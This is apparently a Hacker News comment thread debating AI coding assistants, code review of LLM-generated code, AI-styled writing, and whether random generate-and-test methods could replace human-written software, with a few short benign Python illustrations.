Caught you! You have been very active on HN the last few days, because these were exactly the projects in the "Show HN: .." category, and you would not be able to name them if you hadn't spent your whole time here :-D
Ha! :-D
As a guy in his mid-forties, I sympathize with that sentiment.
I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code.
Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
Yeah agreed - it all depends on how quickly AI (or more aptly, AI-driven work done by humans hoping to make a buck) starts replacing real chunks of production workflows.
“Prediction is hard, especially about the future” - Yogi Berra
As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I’ve even launched 2 AI startups and am working on a third - but it’s all so unpredictable and hardly lucrative yet.
As an over 50 year old - I’m a clear target for replacement by AI
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc.
At most of the companies I've worked at, the development team is more like a cluster of individuals who all happen to be contributing to a shared codebase than anything resembling an actual team collaborating on a shared goal. AI-assisted engineering would have helped massively, because the AI would be looking beyond the myopic view of any developer who is focused only on their tiny domain within the bigger whole.
Admittedly though, on a genuinely good team it'll be less useful for a long time.
I'm currently in a strange position where I am that developer with 15+ years of industry experience, managing a project that's been taken over by a young AI/vibe-code team (against my advice) that plans to do a complete rewrite in a low-code service.
The project was started in the late 00s, so it has a substantial amount of business logic, rules and decisions. Maybe I'm being an old man shouting at the clouds, but I assume (or hope?) it would fail to deliver whatever they promised to the CEO.
So, I guess I'll see the result of this shift soon enough - hopefully at a different company by the time AI-people are done.
The problem is, feedback cycles for projects are long. Like 1-10 years depending on the nature and environment. As the saying goes, the market can remain irrational longer than you can remain solvent.
Maybe the deed is done here, and I'd agree it's not particularly fun, but you could still think about what you can bring to the table in situations like this. Can you work on shortening these pesky feedback cycles? Can you help the team (if they even accept it) with _some_ degree of engineering? It might not be the last time this happens.
I think right now we're seeing some weird stuff going on, but I think it hasn't even properly started yet. Remember when pretty much every company went "agile"? In most cases I've seen they didn't, just wasting time chasing miracles with principles and methodologies few people understand deeply enough to apply. Yet this went on for, what, 10 years?
Everyone who is responsible for SOC 2 at their company just felt a disturbance.
Honestly, I can't wait for AI: development practices to mature, because I'm really tired of the fake hype and missteps getting in the way of things.
Why would AI not fall for fake hype?
Meanwhile here’s me still just using the ChatGPT web chat asking it for code snippets.
I found that when I used ChatGPT's web chat, I frequently went back and forth, shuttling its output to an editor or IDE and then coming back to ChatGPT with "oh, now it fails like this: ...". It made me feel like I was the automaton now.
Claude Code was transformative, and it made me realize that something incredibly significant had occurred. Letting the LLM "drive" like this was inevitable. Now I see exactly how this will transform our industry. I'm a little scared about how it will end for me/us, but excited for now.
I've found that "back and forth" is part of the learning aspect LLMs provide. Even when the LLM provides code snippets, I type them out myself, which forces me to think about and understand them - often finding flaws and poor assumptions along the way.
Letting an LLM drive in an agentic flow removes you from the equation. Maybe that's what some want - but I've personally found I end up with something that doesn't feel like I wrote it.
Now... get off my lawn!
It's correct, you didn't write it. Do you also avoid using frameworks and libraries out of a desire to feel like you wrote the program you produced? You must have another reason not to want to use this code.
When you use frameworks or libraries, you are trusting (hoping) the author(s) spent the time to get it right. At a minimum, the framework/library is documented in literal documentation and/or code that's static and can be read and understood by you. Ask an LLM to do a task 3 times, you'll get 3 different outputs - they're non-deterministic.
I catch a lot of nonsensical and inefficient code when I have that "back and forth" described above - particularly when it comes to architectural decisions. An agent producing hundreds or thousands of lines of code, and making architectural decisions all in one-go will mean catching those problems will be vastly more challenging or impossible.
I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code. It's just a mental/brain drain. I've wasted so many hours wondering if I'm just dumb and missing something or not-understanding some code - only to later realize the LLM was on the fritz. Having little or no previous context to understand the code creates a "standing at the foot of Mt. Everest" feeling constantly, over and over.
>I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code.
absolute opposite here.
LLMs, for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code and TDD-ish tests. If the language they're using supports them, types will be spotty or inconsistent. Variable naming schemes will change with whatever trend was current when the author wrote that snippet; and whatever format they feel like using that day will use randomized vocabulary, with lots of non-speak like 'value' or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humans... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
But my point: real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. It's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code; use it to polish brass.
garbage in -> garbage out ain't going anywhere.
False equivalency. The maintenance and expertise required to run the codebase you've generated still falls squarely on you. When you use a library or a framework, it's normally domain experts who do that stuff.
I’m so glad we’ve got domain experts to write those tricky things like left-pad for us.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
I'm reminded of the recent "vibe coded" OCaml fiasco[1].
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in part due to the significant maintenance burden these entirely LLM-written PRs would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
[1] https://github.com/ocaml/ocaml/pull/14369
Yeah, but honestly VSCode with the Github Copilot plugin works in a similar way. It might not be as good, but it works.
I've been doing this forever, but just a few days ago I tried connecting VS Code to Github Copilot. The experience wasn't entirely unpleasant. I'm still on a familiar IDE and fall back to traditional development patterns whenever I want, while relying on Copilot to make targeted changes that I would find too simple and tedious to manually do.
Try Cursor Composer! It's the most natural transition. Exactly what you're currently doing, but it inserts the code snippets for you from within your IDE.
I do that too.
> Use Claude Code if you
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximalist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
Do you find yourself making manual changes 50%, 40%, 30%… of the time?
Always curious to hear how individuals have their workflows, if you don’t mind sharing.
My only gripe with the Goland integration is if you have multiple terminals open with CC, it will randomly switch to the first terminal for no apparent reason. Then, if you aren't paying close attention, you prompt the wrong instance.
"my experience from 5 years of coding with AI" immediately disregarded the rest of TFA.
I really love AI for lots of things, but, when I'm reading a post, the AI aesthetic has started to grate. I read articles and they all have the same "LLM" aesthetic, and I feel like I'm reading posts written by the same person.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
Which sections were you most put off by?
I used Claude to expand on my ideas for a few of the purely informational things, and for formatting, but this article is largely written by hand.
For example "Interface tests are the ability to know what's wrong and explaining it." is in hindsight a confusing sentence. Many such cases.
It's things like this "super impactful!!!" style it has:
> Enter Claude Code 2.0.
> The UX had evolved. The harness is more flexible and robust. Bugs are fixed. But that's all secondary.
It's OK for emphasis on some things, but when you see it on every blog, it's a bit much.
Plus, I dislike that everything is lists with LLMs, it's another thing that you just start seeing everywhere.
That section doesn't include a lick of AI writing. One tell (maybe?) is that I switch from past tense to present tense mid sentence.
Either a) I sound like an LLM when I'm writing articles (possible) or b) turing test AGI something something.
The lists point is fair, I did use Claude for formatting. Where did it put you off here?
There isn't a specific place, it's the general aesthetic. Maybe you do sound like an LLM :P I guess it's not unlikely to pick up some mannerisms from them when everyone is using them.
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
> a) I sound like an LLM when I'm writing articles (possible) or b) turing test AGI something something.
We entered the machinable culture. We spent many years trying to make the machine mimic humans, now humans are mimicking the machine :)
What's crazy to me is that it literally takes one sentence in your prompt to make it change the style, but I guess some people are not bothered by it.
Would appreciate feedback, see my comment above!
My brain kinda shuts off when I read this stuff because I know it's more of a "text shaped object" than actual text. I find LLM text to be too fluffy and information sparse much of the time so I subconsciously start skimming it more than actually reading it.
Outside of the story at the start I intentionally tried to make it information dense. Would appreciate feedback!
>I built a genetic algorithm simulator with interactive visualizations showing evolution in real-time including complex fitness functions, selection pressure, mutation rates, and more in 1 day. I didn't write a single line of the code.
I'm really trying to understand this. From a learner point of view this is useless because you aren't learning anything. From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
This must be the fifth article I have read today (mostly from the home page of HN) that has "Enter X" where X is what they are promoting.
>> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
I think this is where things will ultimately head. You generate random code, purely random in raw machine-readable binary, and simply evaluate a behavior. Most randomly generated code will not work. Some, however, will work. And within that working code, some will be far faster, and this is the code that is used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
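A toy sketch of the idea, in Python rather than raw binary, and with a made-up representation where a "program" is just two integers (a, b) meaning f(x) = a*x + b:

    import random

    # the desired behavior, expressed only as input/output checks (the "tests")
    TESTS = [(0, 1), (3, 7), (10, 21)]   # i.e. we want some f with f(x) == 2*x + 1

    def random_program():
        # a "program" here is just two integers (a, b), interpreted as f(x) = a*x + b
        return (random.randint(-10, 10), random.randint(-10, 10))

    def passes(prog):
        a, b = prog
        return all(a * x + b == y for x, y in TESTS)

    def generate_and_test(max_tries=1_000_000):
        for _ in range(max_tries):
            candidate = random_program()
            if passes(candidate):
                return candidate
        return None

    print(generate_and_test())   # almost always prints (2, 1)

With only 441 possible candidates this converges almost instantly; whether future compute makes the same trick viable for real program spaces is the open question.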
Why should we throw away decades of development in deterministic algorithms? Why do tech people mention "geneticists"? I would never select an algorithm with a "good" flying trait to make an airplane work; that's nuts.
But you have selected an algorithm with a "good" flying trait already for making airplanes. Just with another avenue to get to it versus pure random generation. The evolution of the bird came up with another algorithm, for example, where birds use flapping wings instead of thrust from engines. Even in airplane development, a lot was learned by studying birds, which are the result of a random-walk algorithm.
No, there is no selection and no traits to pick; it's the culmination of research and human engineering. An airplane is a complex system that needs serious engineering. You can study birds, but only up to a certain point; if you like that, go bird watching, but it's anything except engineering.
>it's the culmination of research and human engineering.
And how is this different than the process of natural selection? More fit ideas win out relative to less fit and are iterated upon.
First of all, natural selection doesn't happen per se, nor is it controlled by some inherent mechanism; it's the by-product of many factors, external and internal. So the comparison is just wrong. Human engineering is an iterative process, not a selection. And if we want to call it selection, even though that's a stretch, we're controlling it - we're the master of puppets - whereas natural selection is anything but a controlled process. We don't select a more resistant wing; we engineer a wing with a high bending tolerance. Again, it's an iterative process.
We do select for a more resistant wing. How did we determine that this wing is more resistant? We modeled its bending tolerance and selected this particular design against other designs that had worse evaluated results for bending tolerance.
And that, my friend, is just engineering; like I said above, it's an iterative process. There is no "natural selection" from randomly shaped wings.
First, how did we model the bending tolerance if everything is just randomness?
Second, there are other algorithms that constructively find a solution and don't work at all like genetic algorithms, such as mathematical solvers.
Third, sometimes, a design is also simply thought up by a human, based on their own professional skills and past experience.
Yes, and it was an intentional process.
Natural selection:
- is not an intentional process
- does not find "the strongest, the fittest, the fastest, etc."
By that logic, everything humans do is per definition result of natural selection. Everything is a sphere if you zoom out far enough.
However, your starting definition was more limited. It was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
(It's not even how LLMs work, in fact)
Great rule of business: sell a solution that causes more problems, requiring the purchase of more solutions.
Customers are tired of getting piles of shit, look at the Windows situation
Or don't sell the solution. When you have monopolies, regulatory capture, and endless mountains of money, you can more or less do what you'd like.
That's a lie; people will eventually find a way out. It has always been like that, be it open source or by innovating, eventually leaving the tech giants that can't innovate to die. We have Linux, and this year will be the most exciting yet for the Linux desktop given how bad the Windows situation is.
Only been hearing that for twenty years and these tech giants are bigger than they’ve ever been.
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I said "being it open source or by innovating" eg Google innovated and killed many, also contributed a lot to open source. Android is a Linux success, ChromeOS too. Now Google stinks and it is not innovating anymore, except for when other companies, like OpenAI, come for their lunch. Google was caught off guard but eventually catching up. Sooner or later, big tech gets eaten by next big tech. I agree if we stop innovating that would never happen, like Open Office is the worst example you could have picked
The problem is that programming logic/state is discrete, not continuous, so you can't assume similar behaviour given "similar state", and possible states grow exponentially. Selecting the desired state will mean writing an extremely detailed spec that is akin to a programming language, which is what Dijkstra hinted at in the past.
Maybe, but you won't be able to test all behaviors and you won't have enough time to try a million alternatives. Just because of the number of possibilities, it'll be faster to just read the code.
That's why you buy a quantum computer. It writes every possible piece of software at once and leaves you the trivial task of curating the one you want.
Eventually, generation and evaluation will be fast enough that testing a million alternatives becomes viable. It's interesting that you suggest there might be a million alternatives, yet it would be faster to just read the code and settle on one. How might that be determined? Did the author who wrote the standard library really come up with the best way when writing those functions? Or did they come up with something that seemed alright to ship relative to the other ideas people came up with?
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. Doing what a trillion humans evaluating different functions could do is actually realistic given the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A million alternatives is peanuts. Restricting the search space to text files with 37 possible symbols (letters, numbers, space), a million different files can be generated with just 4 symbols.
A trillion is 8 symbols. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
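The arithmetic is quick to check (a sketch, assuming the same 37-symbol alphabet as above):

    import math

    ALPHABET = 37                  # letters, digits, space

    print(ALPHABET ** 4)           # 1874161 -> already past a million with 4 symbols
    print(ALPHABET ** 8)           # 3512479453921 -> past a trillion with 8 symbols

    # number of decimal digits in 37**8000, i.e. the count of possible 8000-symbol files
    print(math.floor(8000 * math.log10(ALPHABET)) + 1)   # 12546 -> "about 12500 digits"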
> restricting the search space to syntactically valid programs (how do you even randomly generate that?)
By using a grammar. Here is an example on how to only generate valid JSON with llama.cpp: https://github.com/ggml-org/llama.cpp/blob/master/grammars/R...
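The idea doesn't depend on llama.cpp specifically; recursive sampling from any context-free grammar only ever yields syntactically valid strings. A toy sketch with a made-up arithmetic grammar (not GBNF syntax):

    import random

    # each symbol maps to a list of alternatives; each alternative is a sequence of symbols
    GRAMMAR = {
        "expr":   [["term"], ["term", "+", "expr"], ["term", "*", "expr"]],
        "term":   [["number"], ["(", "expr", ")"]],
        "number": [["0"], ["1"], ["2"], ["3"]],
    }

    def generate(symbol="expr", depth=0):
        if symbol not in GRAMMAR:          # terminal symbol: emit it as-is
            return symbol
        # past a depth limit, always take the first (non-recursive) alternative so we terminate
        alts = GRAMMAR[symbol][:1] if depth > 6 else GRAMMAR[symbol]
        return "".join(generate(s, depth + 1) for s in random.choice(alts))

    print(generate())   # e.g. "(1+3)*2" -- always a well-formed expression, never gibberish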
> A trillion is 8 symbols. You still haven't reached the end of your first import statement.
Since LLMs use tokens from a vocabulary instead of characters, the number is likely somewhere in the lower billions for the first import statement.
But of course, LLMs do not sample from a uniform random distribution, so there are even fewer likely possibilities.
This comment strikes me as not having a good intuition for how fast the space of possible programs can grow.
You don't think the space of possible problems can be parsed with increased compute?
Not for all problems, definitely not. As an example of extremely fast-growing problem spaces, look at the Busy Beaver functions:
https://en.wikipedia.org/wiki/Busy_beaver
If this were viable, we'd all be running Haiku ten times in the time it took to run Opus once, but nobody does.
We don't have the compute for this today. We will in several centuries, if compute growth continues.
We would definitely need centuries for this, because Moore's law has been dead for a while, while the number of possible programs grows exponentially with program length.
But I hope we have more efficient ways to do this in a century.
For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.
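To see how quickly "the tests are the program" becomes literal, here's a property-based sketch using the Hypothesis library (my_sort is a hypothetical stand-in for whatever the generator spat out): pinning down even a sorting routine means restating what sorting is.

    from hypothesis import given, strategies as st

    my_sort = sorted        # stand-in; imagine this is whatever the generator produced

    @given(st.lists(st.integers()))
    def test_sort_is_fully_specified(xs):
        out = my_sort(xs)
        assert out == sorted(out)           # the output is ordered
        assert len(out) == len(xs)          # nothing was added or dropped
        assert all(out.count(v) == xs.count(v) for v in set(xs))   # same multiset of elements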
Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?
> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.
This doesn't work when the software in question is written by competent humans, let alone by the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input; it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is nowhere near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
https://www.mcgill.ca/oss/article/student-contributors-did-y...
Evolution ain't all that great.
> Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.
Yes, and our species is a fragile, barely functioning piece of machinery with an insane number of failure points and hilariously bad, inefficiently placed components.
I can see a lot of negatives in relation to removing the human readable aspect of software development. Thorough testing would be virtually impossible because we’d be relying on fuzzing to iron out potential edge cases or bugs.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms. Maybe take a step back and examine your own biases.
> All these questions are true for agriculture, yet you say "yes thank you, and please continue" for that industry I am sure, which seeks to improve product through random walk and unknown mechanisms.
Tell me you know nothing about modern agriculture without telling me that
You're describing genetic algorithms: https://en.wikipedia.org/wiki/Genetic_algorithm
Exactly. As compute increases these algorithms will only get more compelling. You can test and evaluate so many more ideas than any human inventors can generate on their own.
I suppose you could generate prompts from "genes" somehow.
All fun and games until you need to debug the rat's nest that you've been continually building. I am actually shocked that people who have coded before have been one-shotted into believing this.
If a bug rears its head it can be dealt with. Again, this is essentially already practiced by humans through breeding programs. Bugs have come up, such as deleterious traits, and we have either engineered solutions to get around them or worked to purge the alleles behind the traits from populations under study. Nothing is ever bug free. The question is if the bugs are show stoppers or not. And random walk iteration can produce more solutions that might get around those bugs.
Agree! Don't let it get too bad. See my other comment on debugging and refactoring being a core part of your workflow.
We would of course need to specify the behaviors to test for. The more precisely we specify these behaviors, the more complexly our end product would be able to behave. We might invent a formal language for writing down these behaviors, and some people might be better at thinking about what kind of tests would need to be written to coax a certain type of end result out of the machine.
But that's future music, forgive a young man for letting his imagination run wild! ;)
If we consider other fields such as biology, behaviors of interest are specified, but I'm not sure a formal language is currently being used per se. Data are evaluated on dimensional terms that could be either quantitative or qualitative. Meta-analysis of some sort might be used to reduce dimensionality to some degree, but that usually happens owing to a lack of power for higher-resolution models.
One big advantage of this future random-walk paradigm is that you would not be bound by the real-world constraints of collecting biological samples. Datasets could be made arbitrarily large, and the cost to do so would follow an inverse relationship with compute gains.
> You generate random code,
Code derived from a training set is not at all "random."
I'm not talking about a training set or a present-day LLM. I mean a truly random binary generator left to its own devices. Let's evaluate what spits out of that, iterated several trillion times over, with the massive compute capability we will have. I am not thinking of this happening in the next couple of years, but in the next couple of centuries.
> Truly random binary generator left to its own device.
This has been tried. It tends to overfit to unseen test environment conditions. You will not produce what you intend to produce.
> the massive compute capability we will have
Just burn carbon in the hopes something magical will happen. This is the mentality of a cargo cult.
We also burn carbon to feed the brain. Compute is what is increasing in capability on the scale of orders of magnitudes just within our own lifetimes. Brainpower is not increasing in capability. If you want future capabilities and technological advancement to occur at the fastest pace possible, eventually we have to leave the slow ape brain behind in favor of sources of compute that can evaluate functions several orders of magnitude faster.
This is a recurring fantasy in LLM threads but makes little sense. Writing machine code is very difficult (even writing byte code for simple VMs is annoying and error-prone). Abstractions are beneficial and increase productivity (per human, per token). It makes essentially no sense to throw away seven decades of productivity increasing technologies to have neural nets punch cards again, and it's not going to happen unless tokens become unimaginably cheap.
Compute is always increasing on this planet. It makes no sense to stick with seven decade old paradigms from the time when we were simply transmuting mathematical proofs into computational functions. We should be exploring the void, we will have the compute for this. Randomness will take away the difficulty as we increase compute to parse over these random functions in reasonable time frames. The idea of limiting technological development to what our ape brain can conceive of on its own on human biological timescales is quite a shackle, honestly.
How do you handle the larger amounts of tests? I did this but my PRs are larger because more tests are needed
I'm not sure. My thinking is this will occur on the scale of the next several hundred years, not the next few.
> You generate random code, purely random in raw machine-readable binary, and simply evaluate a behavior. Most randomly generated code will not work. Some, however, will work. And within that working code, some will be far faster, and this is the code that is used.
Humans are expensive, but this approach seems incredibly inefficient and expensive too. Even a junior can make steady progress toward implementing a function; with your approach, just monkey-coding like that could take ages to write a single function. Estimates in software are already bad; they will get worse with your approach.
Today it might not work given what a junior could do against the cost of compute through random walk, but can you say the same in three centuries? We increase compute by the year, but our own brainpower does not increase on those terms. Estimates are that we are actually losing brainpower over time.
And how exactly do you foresee probabilistic systems working out in real life? Nobody wants software that seldom does what they expect, and which tends to trend toward desirable behavior over time (where "desirable" behavior is determined by the sum of global feedback and revenue/profit of the company producing it).
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
You're thinking of probabilistic systems at run time. People are talking about probabilistic systems at compile time.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
I'm not, I'm thinking of poorly engineered systems that display buggy, unintended behaviors at runtime.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
Tests don't go over the space of all possible inputs and you have no idea how other inputs are generalized or interpolated.
I think you misunderstand. Once established a function found through random walk is no different than a function found in any other way. If it works it works, if it doesn't it doesn't.
I didn't misunderstand. I'm talking about all the exciting unintended behaviors you're adding and all the invariants that you're not preserving by arriving at solutions through randomness rather than careful design and engineering.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
I can tell you why this won't go this way:
Customers.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You are thinking in terms of the next few years not the next few centuries. Plenty of software sold today fails to meet expectations and no one eats costs.
The "Council of models" is a good first step, but ultimately I found myself settling on an automated talent acquisition pipeline.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per token (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
Is this satire? I can't tell any more.
I sincerely hope so. Gas Towns, Birthing Pools, Ralf Wiggums. Some people seem to have lost any sense of reality.
I don't understand why people try so hard to anthropomorphize these tools and map them to human sociology...
It's all abstractions to help your brain understand what electrons are doing in impossibly pure sand. Pick the one that frees the most overhead to think about problems that matter
*Note:* This is mostly relevant for solo developers, where accountability is much lower than in a team environment.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
Use both ~ Claude Code as the main driver; hook it up to Cursor with /ide in Claude Code to review or make other manual adjustments.
Have OpenAI Codex do code reviews, it’s the best one so far at code reviews. Yes, it’s ironic (or not) that the code writer is not the best reviewer.
>> You no longer need to review the code.
You also no longer need to work, earn money, have a life, read, study, or know anything about the world. This is pure fantasy; my brain farts hard when I read sentences like that.
> You also no longer need to work, earn money, have a life, read, study, or know anything about the world. This is pure fantasy
This will be reality in 10-20 years
A traditional Marxist revolution is more likely than that.
It's already a reality if you want it to be; today and in 10-20 years the outcome will be the same: being homeless! And no, please, no UBI BS, thanks.
99.9% of today’s jobs will be fully automated in 20 years. What do you think will happen to all the unemployed population?
I remember when they were saying that 20 years ago
Hahahahaha. Please, can you advise on lottery numbers? I'd like to win a bunch of money before losing my job.
Before I waste any time on this article, is the "0.01%" claim backed up with any evidence?
He shows an alleged screenshot of an email sent by the vendor. There is also a cool animation of what seems to be a chromosome gallery produced by a genetic algorithm of some sort, which took Claude 1 day.
If you like Claude Code, then Gas Town (recent discussion [1]) will probably blow your mind. I'm just trying to get a grip on it myself. But it sounds incredible.
[1] https://news.ycombinator.com/item?id=46458936
The mayor doesn't communicate to the deacon or refiner well enough. Sometimes my polecat acts like a witness so I have to restart it...
Jesse what the fuck are you talking about
Just wait ‘til Gas City ships.
This town ain't big enough for the both of us
I am still a WindSurf user. It has the quirk of deciding for itself on any given day whether to use ChatGPT 5.2 or Claude Opus 4.5 in Cascade (its agentic side panel). I've never noticed much of a difference, they are both amazing.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am I missing? (serious question, I do have Claude Code FOMO like the OP)
Wondering too, I found Windsurf excellent for what it does, but do miss my preferred $EDITOR
Thank you for this article! It was way richer than others, with some actionable advice.
I guess I'll finally try Claude Code; need to get a burner SIM first though… I cannot for the life of me understand why I can sign up for the API without one, yet must give a mobile phone number for the product.
> my experience from 5 years of coding with AI
What AI have you been using for 5 years of coding?
Probably the original GitHub Copilot
It is only 4 years old
The technical preview was in June 2021. I was using it for a bit before that as an internal employee, so they may have rounded up slightly, or they may also have been an internal beta tester.
Side note: I've been trying to remember when it launched internally, if anybody knows. I feel like it was pre-COVID, but that's a long timeline from internal use to public preview.
Yes, the technical preview of Github Copilot. I rounded up.
Fair enough! The jump from that to ChatGPT's launch (which I didn't find that interesting), to GPT-4, to Claude Code/Codex CLI, to Gemini 3/Opus 4.5/GPT 5.2 has been insane in such a short time. I'm excited (since the release of the Codex CLI especially: https://dkdc.dev/posts/modern-agentic-software-engineering/)
More importantly: what software of value have they produced in that time? I glanced around their site and just saw a bunch of teaching materials about AI.
https://github.com/SilenNaihin
Github Copilot was available in 2021, believe it or not. It was just auto-complete plus a chat window, but it seemed like a big deal at the time.
If auto-complete is AI coding then I've been doing it since 2001.
This caught me by surprise. Wow time flies.
If AI can 10x then that's 50 years worth of development. Likely OP has developed a UNIX like operating system, is my guess.
10x in personal branding positioning, for sure. 5 years of AI usage by rounding up 4-years-something, where the first 2 were really a glorified autocomplete, and top 0.01% of something something.
And they have already retired.
I heard they created Plan10: An AI-files based Linux version.
Plan 10 from Latent Space
Keyboard autocomplete?
I use Cursor on a daily basis. It is good for certain use cases, and horribly bad for some others. Read the below keeping that in mind! I am not an LLM skeptic.
It is wild that people are so confident with AI that they're not testing the code at all.
What are we doing as programmers? Reducing the typing + testing time? Because we still have to write the prompt in English and do the software design; otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs. And before anyone says they're entitled not to share their hidden talents - then they should stop publishing articles as well.
You can't have your cake and eat it too!
Anyone tried Claude Code with a z.ai subscription?
It's only a fraction of the price, but with 3 times the limits.
I currently use a Github subscription for hobby projects.
